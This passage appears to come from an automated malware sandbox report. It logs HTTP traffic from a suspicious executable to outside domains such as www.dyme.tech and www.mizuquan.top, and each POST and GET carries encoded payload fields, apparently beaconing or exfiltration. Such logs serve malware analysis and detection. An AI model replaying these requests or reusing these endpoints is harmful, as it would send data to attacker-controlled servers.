              Data Ascii: 0th4S=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQy+00u4zFoqVkFwSR0Xf9U6JNIPCRWVGI8ZXf46bGQk+P1zLEuux2/425iyYRf4AyzC8aMKNh15jmZTVvk2H+VX8yeYx6Ij6ayKrxU0pp/gYBG861lbIoF5/S6Mf3hgZCnOXd9cFTNnDgp2otGSjGK9i3T2lG9cqxKXzvCuhyrMdmvphYxSFy4Kh3dHOT4jxH/fs9nKo0qilH97dwfVd1ZsaCd+/p+XveUde/hCZBm/IdUtB38OABDAN4lqmo0oot90oJ1M23Ab0TsrSQgeWPovR9QYadj86sVwYJ3Gw4S/urFOSvecZZnSsUAeMcJR28vlqbWDCngko59GoVOc5csfmqj7z+fBjGcN7ZXSJn7nF4aPgNDbVGSE3kpFLv1avQihi0AHavudAIP4Wm8Ch/gbtFgBCoJM+gpX1N+32K7QJ5nvkqHzJcGHOWBEirrUFuADylVqpOR1ZSbWPDEtzwwb1oldoaTx1cw9xetxtCh5zsPuCX5uLwOiO8Z+KMu+BVAt0Q8eqlQYqFjkxN7ewZ8LRpOMysGg6WwLqfbFnJ11qMVpZCWNBA5LMS72ON0TpraCtVUkyfM4L7CzsVkzsEHDMUldcpUVOVpIou1JS4pqz4iBiHpVSDSuLx8Y1iE2V2XsnJSSv9DINMphV3EhGI+SNJ58jQ13LQcKIt5N3l8gMbAz4MFBwutIJT2t3zvH9zkI/CfQoEIehr32wylgVpAP3d6fkOJz+8c6eF36Z3Ovw7KzE1vLRglSFU7A5pb7ij6pkYQSjeL3o0nwPJz5i5yEwitMJjaVI3osQkszbnrup0pvT0Cr7dyAzuXQcrlqfDrnW0c [TRUNCATED]
              Sep 22, 2024 17:58:01.263776064 CEST500INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:58:01 GMT
              Server: Apache
              X-Xss-Protection: 1; mode=block
              Referrer-Policy: no-referrer-when-downgrade
              X-Content-Type-Options: nosniff
              X-Frame-Options: SAMEORIGIN
              Content-Length: 196
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.114973891.184.0.200806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:03.036658049 CEST553OUTGET /ikh0/?0th4S=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1qK6qUK96iio+RiU/b4DSTCXDmv8QzV8Y/qA=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.jobworklanka.online
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:58:03.668576002 CEST500INHTTP/1.1 404 Not Found
              Date: Sun, 22 Sep 2024 15:58:03 GMT
              Server: Apache
              X-Xss-Protection: 1; mode=block
              Referrer-Policy: no-referrer-when-downgrade
              X-Content-Type-Options: nosniff
              X-Frame-Options: SAMEORIGIN
              Content-Length: 196
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.114973913.248.169.48806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:08.765122890 CEST800OUTPOST /h7lb/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.dyme.tech
              Origin: http://www.dyme.tech
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.dyme.tech/h7lb/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 73 76 64 78 39 6a 71 38 50 39 45 61 50 6f 65 77 75 4f 77 76 71 4b 55 5a 34 6b 39 6c 7a 42 55 46 78 51 3d 3d
              Data Ascii: 0th4S=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Ksvdx9jq8P9EaPoewuOwvqKUZ4k9lzBUFxQ==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.114974013.248.169.48806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:11.325226068 CEST820OUTPOST /h7lb/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.dyme.tech
              Origin: http://www.dyme.tech
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.dyme.tech/h7lb/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 63 62 73 43 63 56 36 77 78 4d 71 52 6e 4c 41 4f 49 54 2b 4b 47 56 79 79 41 58 51 68 4e 68 47 4c 59 3d
              Data Ascii: 0th4S=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZcbsCcV6wxMqRnLAOIT+KGVyyAXQhNhGLY=


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.114974113.248.169.48806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:13.865108013 CEST1833OUTPOST /h7lb/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.dyme.tech
              Origin: http://www.dyme.tech
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.dyme.tech/h7lb/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 41 71 4c 72 53 73 71 75 52 66 34 76 6b 74 34 69 51 67 31 79 70 7a 79 44 66 58 4f 73 4e 68 73 64 32 66 39 44 56 61 4d 42 6c 59 63 76 48 51 74 51 70 76 6b 77 65 71 38 42 6d 62 55 69 37 35 74 48 59 78 66 2b 43 2b 6e 77 64 4c 50 58 33 7a 33 32 73 73 58 6e 36 71 30 44 41 59 6e 38 59 57 65 59 72 7a 62 32 68 68 4c 4f 55 36 79 4f 45 6d 2b 64 49 58 72 45 49 61 35 39 6a 2b 61 46 65 49 6d 38 66 6c 48 54 78 68 44 6f 59 52 57 4a 30 78 42 47 6b 44 37 49 52 35 53 76 63 45 37 43 74 56 67 70 32 4b [TRUNCATED]
              Data Ascii: 0th4S=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/AqLrSsquRf4vkt4iQg1ypzyDfXOsNhsd2f9DVaMBlYcvHQtQpvkweq8BmbUi75tHYxf+C+nwdLPX3z32ssXn6q0DAYn8YWeYrzb2hhLOU6yOEm+dIXrEIa59j+aFeIm8flHTxhDoYRWJ0xBGkD7IR5SvcE7CtVgp2K99SCM65sdBt7AlsktZeF79krTExzicIb+lgz0nILLi84nKkxRK8pO+3vtgMiC4p2ppuRUiXYSDjl8ehyAmCdty54ix2W1s+qC80hPeqFagVRx+zvKB7TdJ/bqZMOEew2MFomKjadc7mb0svIFhVLmm9di2c9WC/Y11bptC+N/VYpDDFYfc8/4zzCZUEdN8hsmUXSHlvEx7aoITbi0T5SYzDy+G+b+p5VZLjgwLUzEz2GZiHSAUcvThshPNhn+WBHVynsdZPDfVEXtKrwudR3+GWoUgz4Nx1aV2NiWcRCqeQbEbcxgUQlLttRW4Yv3IIWLjnFEbJs9e6Jnx2hiUwbJp4li2NgTfKZIDKmyC+jpJnaJDylwtkmkxZpybrxOsPw6AMnbwAvhiF/Iyj/nkonDPgK52yXfRpsRbiJYM0grmbOjYwBOGYxBiVD9eULmzbjSgDiMTQv9cIQq8yVX7cB6aPCPf1niuXoz/bVx8oj893AljH/IXFDXST+ZroxPbsgEL94R8NfDxY6I03v95T+enz5eqWeKLLOwAf+qSygDDDFGFaBBjIkQw6tGupJ4OoS2BHdtQKpu9dBl2kTaMer3pI7nEsO/cRupCDdX3PxN5CebYrRFXuvWmDayrOBpwLXwTypQBx9OTVuIq5x09Gv7aSYIaIl0p68pJ [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.114974213.248.169.48806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:16.415445089 CEST543OUTGET /h7lb/?0th4S=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0Q9w2g6Txj+QK6DQX/6Khz9Uha7obgVbYrKE=&u2pl=VvmP2xFp HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.dyme.tech
              Connection: close
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Sep 22, 2024 17:58:16.891163111 CEST395INHTTP/1.1 200 OK
              Server: openresty
              Date: Sun, 22 Sep 2024 15:58:16 GMT
              Content-Type: text/html
              Content-Length: 255
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 74 68 34 53 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 42 49 65 6c 4a 35 47 4f 35 31 47 47 4d 58 56 69 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 51 39 77 32 67 36 54 78 6a 2b 51 4b 36 44 51 58 2f 36 4b 68 7a 39 55 68 61 37 6f 62 67 56 62 59 72 4b 45 3d 26 75 32 70 6c 3d 56 76 6d 50 32 78 46 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0th4S=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0Q9w2g6Txj+QK6DQX/6Khz9Uha7obgVbYrKE=&u2pl=VvmP2xFp"}</script></head></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.114974743.242.202.169806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:36.573174953 CEST809OUTPOST /e0nr/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.mizuquan.top
              Origin: http://www.mizuquan.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 202
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.mizuquan.top/e0nr/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 4f 66 68 4d 50 6f 50 65 4c 6b 31 42 6b 38 53 53 68 43 38 78 4a 4c 49 64 52 68 42 44 2b 71 55 48 64 77 3d 3d
              Data Ascii: 0th4S=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoOfhMPoPeLk1Bk8SShC8xJLIdRhBD+qUHdw==
              Sep 22, 2024 17:58:37.445209026 CEST691INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Sun, 22 Sep 2024 15:58:37 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.114974843.242.202.169806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:39.116216898 CEST829OUTPOST /e0nr/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.mizuquan.top
              Origin: http://www.mizuquan.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 222
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.mizuquan.top/e0nr/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 41 66 46 48 67 7a 33 62 78 4f 47 39 39 34 38 72 39 61 55 7a 37 6a 2f 73 6a 56 77 37 66 38 48 6b 67 3d
              Data Ascii: 0th4S=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYAfFHgz3bxOG9948r9aUz7j/sjVw7f8Hkg=
              Sep 22, 2024 17:58:39.997381926 CEST691INHTTP/1.1 404 Not Found
              Server: nginx
              Date: Sun, 22 Sep 2024 15:58:39 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: close
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.114974943.242.202.169806316C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exe
              TimestampBytes transferredDirectionData
              Sep 22, 2024 17:58:41.670500994 CEST1842OUTPOST /e0nr/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Host: www.mizuquan.top
              Origin: http://www.mizuquan.top
              Content-Type: application/x-www-form-urlencoded
              Content-Length: 1234
              Connection: close
              Cache-Control: max-age=0
              Referer: http://www.mizuquan.top/e0nr/
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Data Raw: 30 74 68 34 53 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 52 51 73 76 71 74 69 77 70 61 51 34 51 6a 66 6e 55 30 36 61 6c 70 4e 2f 4e 51 7a 62 4a 36 41 31 33 57 30 4a 54 46 73 5a 6e 4d 64 77 65 51 32 4d 31 74 46 6b 30 6c 64 4f 62 34 74 71 70 6e 65 65 74 57 30 51 64 67 52 75 39 6b 49 51 62 38 61 55 56 58 2b 69 41 74 50 45 43 32 65 58 48 73 54 49 2b 44 6d 4e 6c 35 2f 6b 54 